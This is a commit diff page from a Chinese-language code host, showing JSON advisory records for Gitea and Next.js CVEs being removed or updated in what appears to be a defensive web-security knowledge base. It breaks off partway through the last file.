hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动

更新: 421 个文件 - 2026-03-17 18:30:02

浏览代码
这个提交包含在:
hao
2026-03-17 18:30:02 -07:00
父节点 29c3faaa28
当前提交 a3edc88834
修改 421 个文件,包含 12474 行新增5845 行删除
下载 Patch 文件 下载 Diff 文件 展开所有文件 折叠所有文件

80
08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json
查看文件

@@ -1,80 +0,0 @@
{
"canonical_id": "gitea--CVE-2018-15192",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
"summary": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
"published_at": "2024-08-20T20:32:20Z",
"updated_at": "2026-03-03T04:54:04.686907Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-fg3x-rwq9-74cw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2018-15192",
"https://github.com/go-gitea/gitea/commit/599ff1c054e436daa4dc3f049aa8661d9c2395f9",
"https://github.com/go-gitea/gitea/issues/4624",
"https://github.com/go-gitea/gitea/pull/17482",
"https://github.com/gogs/gogs/commit/22717a1c064511cf37c46af5e650baf7184cf25b",
"https://github.com/gogs/gogs/issues/5366",
"https://github.com/gogs/gogs/pull/6002"
],
"aliases": [
"CVE-2018-15192",
"GHSA-fg3x-rwq9-74cw",
"GO-2023-1971"
],
"cve_ids": [
"CVE-2018-15192"
],
"ghsa_ids": [
"GHSA-fg3x-rwq9-74cw"
],
"osv_ids": [
"GO-2023-1971"
],
"affected_versions": [
"introduced=0, fixed<1.16.0-rc1",
"introduced=0, fixed<0.12.0"
],
"fixed_versions": [
"1.16.0-rc1",
"0.12.0"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"ssrf-url-validation"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

74
08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json
查看文件

@@ -1,74 +0,0 @@
{
"canonical_id": "gitea--CVE-2018-18926",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
"summary": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:20.787387Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-hf6f-jq25-8gq9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2018-18926",
"https://github.com/go-gitea/gitea/commit/aeb5655c25053bdcd7eee94ea37df88468374162",
"https://github.com/go-gitea/gitea/issues/5140",
"https://github.com/go-gitea/gitea/pull/5177"
],
"aliases": [
"CVE-2018-18926",
"GHSA-hf6f-jq25-8gq9",
"GO-2022-0844"
],
"cve_ids": [
"CVE-2018-18926"
],
"ghsa_ids": [
"GHSA-hf6f-jq25-8gq9"
],
"osv_ids": [
"GO-2022-0844"
],
"affected_versions": [
"introduced=0, fixed<1.5.2"
],
"fixed_versions": [
"1.5.2"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

73
08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json
查看文件

@@ -1,73 +0,0 @@
{
"canonical_id": "gitea--CVE-2019-1010261",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea XSS Vulnerability in code.gitea.io/gitea",
"summary": "Gitea XSS Vulnerability in code.gitea.io/gitea",
"published_at": "2024-08-20T20:31:38Z",
"updated_at": "2026-03-03T04:53:57.848904Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-5rh7-6gfj-mc87",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2019-1010261",
"https://github.com/go-gitea/gitea/pull/5905"
],
"aliases": [
"CVE-2019-1010261",
"GHSA-5rh7-6gfj-mc87",
"GO-2023-1922"
],
"cve_ids": [
"CVE-2019-1010261"
],
"ghsa_ids": [
"GHSA-5rh7-6gfj-mc87"
],
"osv_ids": [
"GO-2023-1922"
],
"affected_versions": [
"introduced=0, fixed<1.7.1"
],
"fixed_versions": [
"1.7.1"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

75
08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json
查看文件

@@ -1,75 +0,0 @@
{
"canonical_id": "gitea--CVE-2020-13246",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Denial of Service in Gitea in code.gitea.io/gitea",
"summary": "Denial of Service in Gitea in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:17.939867Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-g2qx-6ghw-67hm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-13246",
"https://github.com/go-gitea/gitea/issues/10549",
"https://github.com/go-gitea/gitea/pull/11438",
"https://www.youtube.com/watch?v=DmVgADSVS88"
],
"aliases": [
"BIT-gitea-2020-13246",
"CVE-2020-13246",
"GHSA-g2qx-6ghw-67hm",
"GO-2022-0830"
],
"cve_ids": [
"CVE-2020-13246"
],
"ghsa_ids": [
"GHSA-g2qx-6ghw-67hm"
],
"osv_ids": [
"GO-2022-0830"
],
"affected_versions": [
"introduced=0, fixed<1.12.0"
],
"fixed_versions": [
"1.12.0"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "gitea--CVE-2021-28378",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
"summary": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:18.307544Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-g95p-88p4-76cm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-28378",
"https://blog.gitea.io/2021/03/gitea-1.13.4-is-released",
"https://github.com/PandatiX/CVE-2021-28378",
"https://github.com/go-gitea/gitea/pull/14898",
"https://github.com/go-gitea/gitea/pull/14899"
],
"aliases": [
"BIT-gitea-2021-28378",
"CVE-2021-28378",
"GHSA-g95p-88p4-76cm",
"GO-2022-0832"
],
"cve_ids": [
"CVE-2021-28378"
],
"ghsa_ids": [
"GHSA-g95p-88p4-76cm"
],
"osv_ids": [
"GO-2022-0832"
],
"affected_versions": [
"introduced=0, fixed<1.13.4"
],
"fixed_versions": [
"1.13.4"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

74
08-threat-intel/registry/advisories/gitea--CVE-2025-68939.json
查看文件

@@ -1,74 +0,0 @@
{
"canonical_id": "gitea--CVE-2025-68939",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
"summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:48.777563Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
"https://blog.gitea.com/release-of-1.23.0",
"https://github.com/go-gitea/gitea/pull/32151",
"https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
],
"aliases": [
"BIT-gitea-2025-68939",
"CVE-2025-68939",
"GHSA-263q-5cv3-xq9g",
"GO-2025-4261"
],
"cve_ids": [
"CVE-2025-68939"
],
"ghsa_ids": [
"GHSA-263q-5cv3-xq9g"
],
"osv_ids": [
"GO-2025-4261"
],
"affected_versions": [
"introduced=0"
],
"fixed_versions": [],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "blocked-artifact",
"verification_mode": "real",
"last_verified_at": "2026-03-17T07:02:56+00:00",
"last_run_id": "gitea-livecheck-20260316",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/gitea-livecheck-20260316",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "official-image",
"blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

75
08-threat-intel/registry/advisories/gitea--CVE-2025-68940.json
查看文件

@@ -1,75 +0,0 @@
{
"canonical_id": "gitea--CVE-2025-68940",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
"summary": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.087298Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-rrcw-5rjv-vj26",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68940",
"https://blog.gitea.com/release-of-1.22.5",
"https://github.com/go-gitea/gitea/pull/32654",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.5"
],
"aliases": [
"BIT-gitea-2025-68940",
"CVE-2025-68940",
"GHSA-rrcw-5rjv-vj26",
"GO-2025-4267"
],
"cve_ids": [
"CVE-2025-68940"
],
"ghsa_ids": [
"GHSA-rrcw-5rjv-vj26"
],
"osv_ids": [
"GO-2025-4267"
],
"affected_versions": [
"introduced=0, fixed<1.22.5"
],
"fixed_versions": [
"1.22.5"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

72
08-threat-intel/registry/advisories/nextjs--CVE-2020-15242.json
查看文件

@@ -1,72 +0,0 @@
{
"canonical_id": "nextjs--CVE-2020-15242",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Open Redirect in Next.js versions",
"summary": "### Impact\n\n- **Affected**: Users of Next.js between 9.5.0 and 9.5.3 \n- **Not affected**: Deployments on Vercel ([https://vercel.com](https://vercel.com)) are not affected\n- **Not affected**: Deployments using `next export`\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n### References\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n",
"published_at": "2020-10-08T19:28:07Z",
"updated_at": "2026-03-13T22:14:13.665535Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-x56p-c8cg-q435",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-15242",
"https://github.com/vercel/next.js",
"https://github.com/zeit/next.js/releases/tag/v9.5.4"
],
"aliases": [
"CVE-2020-15242",
"GHSA-x56p-c8cg-q435"
],
"cve_ids": [
"CVE-2020-15242"
],
"ghsa_ids": [
"GHSA-x56p-c8cg-q435"
],
"osv_ids": [
"GHSA-x56p-c8cg-q435"
],
"affected_versions": [
"introduced=9.5.0, fixed<9.5.4"
],
"fixed_versions": [
"9.5.4"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

18
08-threat-intel/registry/advisories/nextjs--CVE-2024-34351.json
查看文件

@@ -49,18 +49,18 @@
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"verification_status": "verified-real",
"verification_mode": "real",
"last_verified_at": "2026-03-18T01:29:57+00:00",
"last_run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"repro_profile_id": "nextjs-ssrf",
"artifact_mode": "local-fixture",
"blocked_reason": null,
"metadata": {
"source_names": [
@@ -70,5 +70,7 @@
"osv-batch"
],
"candidate_count": 1
}
},
"historical_status": "verified-real",
"latest_status": "verified-real"
}

73
08-threat-intel/registry/advisories/nextjs--CVE-2024-51479.json
查看文件

@@ -1,73 +0,0 @@
{
"canonical_id": "nextjs--CVE-2024-51479",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js authorization bypass vulnerability",
"summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
"published_at": "2024-12-17T15:09:06Z",
"updated_at": "2025-09-10T21:12:24Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
"https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v14.2.15"
],
"aliases": [
"CVE-2024-51479",
"GHSA-7gfc-8cq8-jh5f"
],
"cve_ids": [
"CVE-2024-51479"
],
"ghsa_ids": [
"GHSA-7gfc-8cq8-jh5f"
],
"osv_ids": [
"GHSA-7gfc-8cq8-jh5f"
],
"affected_versions": [
"introduced=9.5.5, fixed<14.2.15"
],
"fixed_versions": [
"14.2.15"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

85
08-threat-intel/registry/advisories/nextjs--CVE-2025-29927.json
查看文件

@@ -1,85 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-29927",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Authorization Bypass in Next.js Middleware",
"summary": "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
"published_at": "2025-03-21T15:20:12Z",
"updated_at": "2026-03-04T15:06:29.993197Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-29927",
"https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2",
"https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v12.3.5",
"https://github.com/vercel/next.js/releases/tag/v13.5.9",
"https://security.netapp.com/advisory/ntap-20250328-0002",
"https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware",
"http://www.openwall.com/lists/oss-security/2025/03/23/3",
"http://www.openwall.com/lists/oss-security/2025/03/23/4"
],
"aliases": [
"CVE-2025-29927",
"GHSA-f82v-jwr5-mffw"
],
"cve_ids": [
"CVE-2025-29927"
],
"ghsa_ids": [
"GHSA-f82v-jwr5-mffw"
],
"osv_ids": [
"GHSA-f82v-jwr5-mffw"
],
"affected_versions": [
"introduced=13.0.0, fixed<13.5.9",
"introduced=14.0.0, fixed<14.2.25",
"introduced=15.0.0, fixed<15.2.3",
"introduced=12.0.0, fixed<12.3.5"
],
"fixed_versions": [
"13.5.9",
"14.2.25",
"15.2.3",
"12.3.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "real",
"last_verified_at": "2026-03-17T06:30:47+00:00",
"last_run_id": "nextjs-nextjs--CVE-2025-29927-20260317063047",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2025-29927-20260317063047",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "official-source",
"blocked_reason": "dry-run only",
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

75
08-threat-intel/registry/advisories/nextjs--CVE-2025-49826.json
查看文件

@@ -1,75 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-49826",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.JS vulnerability can lead to DoS via cache poisoning ",
"summary": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
"published_at": "2025-07-03T21:14:48Z",
"updated_at": "2025-07-03T21:49:52Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49826",
"https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2",
"https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.1.8",
"https://vercel.com/changelog/cve-2025-49826"
],
"aliases": [
"CVE-2025-49826",
"GHSA-67rr-84xm-4c7r"
],
"cve_ids": [
"CVE-2025-49826"
],
"ghsa_ids": [
"GHSA-67rr-84xm-4c7r"
],
"osv_ids": [
"GHSA-67rr-84xm-4c7r"
],
"affected_versions": [
"introduced=15.0.4-canary.51, fixed<15.1.8"
],
"fixed_versions": [
"15.1.8"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

76
08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json
查看文件

@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-55173",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Content Injection Vulnerability for Image Optimization",
"summary": "A vulnerability in **Next.js Image Optimization** has been fixed in **v15.4.5** and **v14.2.31**. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.\n\nAll users relying on `images.domains` or `images.remotePatterns` are encouraged to upgrade and verify that external image sources are strictly validated.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-55173)",
"published_at": "2025-08-29T21:59:55Z",
"updated_at": "2026-02-04T04:35:34.538107Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-55173",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-55173",
"http://vercel.com/changelog/cve-2025-55173"
],
"aliases": [
"CVE-2025-55173",
"GHSA-xv57-4mr9-wg8v"
],
"cve_ids": [
"CVE-2025-55173"
],
"ghsa_ids": [
"GHSA-xv57-4mr9-wg8v"
],
"osv_ids": [
"GHSA-xv57-4mr9-wg8v"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.31",
"introduced=15.0.0, fixed<15.4.5"
],
"fixed_versions": [
"14.2.31",
"15.4.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

76
08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json
查看文件

@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-57752",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Affected by Cache Key Confusion for Image Optimization API Routes",
"summary": "A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. When images returned from API routes vary based on request headers (such as `Cookie` or `Authorization`), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug.\n\nAll users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57752)",
"published_at": "2025-08-29T22:06:22Z",
"updated_at": "2026-02-04T02:50:08.291668Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57752",
"https://github.com/vercel/next.js/pull/82114",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57752"
],
"aliases": [
"CVE-2025-57752",
"GHSA-g5qg-72qw-gw5v"
],
"cve_ids": [
"CVE-2025-57752"
],
"ghsa_ids": [
"GHSA-g5qg-72qw-gw5v"
],
"osv_ids": [
"GHSA-g5qg-72qw-gw5v"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.31",
"introduced=15.0.0, fixed<15.4.5"
],
"fixed_versions": [
"14.2.31",
